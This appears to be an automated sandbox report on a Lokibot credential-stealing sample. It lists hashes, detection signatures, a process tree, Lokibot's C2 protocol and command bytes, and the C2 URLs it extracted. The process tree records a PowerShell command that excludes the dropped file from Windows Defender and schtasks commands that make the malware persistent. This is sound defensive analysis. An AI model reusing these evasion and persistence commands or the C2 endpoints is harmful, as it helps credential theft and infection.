Edit tour

Windows Analysis Report
gunzipped.exe

Overview

General Information

Sample name:	gunzipped.exe
Analysis ID:	1427123
MD5:	8864b52d242037414b7c4a230c390ab8
SHA1:	47680d0f0d286097f7cdda37947aaaacd7226ee3
SHA256:	d405284f75cde4b8c45e3d5c3b41c7bbd6db2c75788cb6d0b1deec5ea60559a4
Tags:	exeLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Lokibot

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

gunzipped.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 8864B52D242037414B7C4A230C390AB8)

powershell.exe (PID: 5684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4180 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6276 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

gunzipped.exe (PID: 3172 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 8864B52D242037414B7C4A230C390AB8)

gunzipped.exe (PID: 4080 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 8864B52D242037414B7C4A230C390AB8)

WiHDtnb.exe (PID: 3220 cmdline: C:\Users\user\AppData\Roaming\WiHDtnb.exe MD5: 8864B52D242037414B7C4A230C390AB8)

schtasks.exe (PID: 1396 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WiHDtnb.exe (PID: 6148 cmdline: "C:\Users\user\AppData\Roaming\WiHDtnb.exe" MD5: 8864B52D242037414B7C4A230C390AB8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://136.244.109.75/index.php/1748937"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17770:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4b3b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1337f:$des3: 68 03 66 00 00 0x17770:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1783c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17750:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4b1b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1335f:$des3: 68 03 66 00 00 0x17750:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1781c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x73844:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x60bf7:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x6f43b:$des3: 68 03 66 00 00 0x73844:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x73910:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xb813c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xa54ef:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0xb3d33:$des3: 68 03 66 00 00 0xb813c:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0xb8208:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: gunzipped.exe PID: 6400	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: gunzipped.exe PID: 6400	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: gunzipped.exe PID: 6400	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: gunzipped.exe PID: 6400	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x20bc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x53a6:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x23db0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: gunzipped.exe PID: 4080	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: WiHDtnb.exe PID: 3220	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: WiHDtnb.exe PID: 3220	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: WiHDtnb.exe PID: 3220	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: WiHDtnb.exe PID: 3220	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x9fcc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: WiHDtnb.exe PID: 6148	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: WiHDtnb.exe PID: 6148	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: WiHDtnb.exe PID: 6148	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x5913:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 40 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.WiHDtnb.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
12.2.WiHDtnb.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.2.WiHDtnb.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.WiHDtnb.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
12.2.WiHDtnb.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
12.2.WiHDtnb.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
12.2.WiHDtnb.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
12.2.WiHDtnb.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.gunzipped.exe.394e380.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.gunzipped.exe.394e380.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.gunzipped.exe.394e380.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.gunzipped.exe.394e380.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.gunzipped.exe.394e380.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.gunzipped.exe.394e380.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.gunzipped.exe.394e380.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.gunzipped.exe.394e380.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.gunzipped.exe.3934360.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.gunzipped.exe.3934360.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.gunzipped.exe.3934360.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.gunzipped.exe.3934360.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.gunzipped.exe.3934360.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.gunzipped.exe.3934360.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.gunzipped.exe.3934360.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.gunzipped.exe.3934360.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.gunzipped.exe.394e380.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.gunzipped.exe.394e380.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.gunzipped.exe.394e380.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.gunzipped.exe.394e380.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.gunzipped.exe.394e380.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.gunzipped.exe.3934360.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.gunzipped.exe.3934360.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.gunzipped.exe.3934360.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.gunzipped.exe.3934360.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.gunzipped.exe.3934360.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
12.2.WiHDtnb.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
12.2.WiHDtnb.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.2.WiHDtnb.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.WiHDtnb.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
12.2.WiHDtnb.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
12.2.WiHDtnb.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
12.2.WiHDtnb.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
12.2.WiHDtnb.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.gunzipped.exe.259d1b4.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.gunzipped.exe.259d1b4.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.gunzipped.exe.259d1b4.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.gunzipped.exe.259d1b4.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x8bf88:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.gunzipped.exe.259d1b4.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x7933b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.gunzipped.exe.259d1b4.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x8894c:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x88b94:$a2: last_compatible_version
0.2.gunzipped.exe.259d1b4.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x87b7f:$des3: 68 03 66 00 00 0x8bf88:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x8c054:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
